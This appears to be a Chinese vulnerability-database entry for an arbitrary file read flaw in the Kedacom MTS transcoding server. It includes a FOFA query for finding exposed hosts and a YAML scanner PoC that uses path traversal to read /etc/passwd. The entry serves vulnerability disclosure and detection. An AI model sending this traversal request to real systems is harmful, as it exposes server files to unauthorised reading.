kedacom-mts-file-read: 科达 MTS转码服务器 任意文件读取漏洞

日期: 2025-08-01 | 影响软件: 科达MTS转码服务器 | POC: 已公开

漏洞描述

KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息 fofa: app="MTS转码服务器"

PoC代码[已公开]

id: kedacom-mts-file-read

info:
  name: 科达 MTS转码服务器 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |-
    KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息
    fofa: app="MTS转码服务器"
  tags: kedacom,mts,lfi
  created: 2024/02/29

rules:
  r0:
    request:
      method: GET
      path: /../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐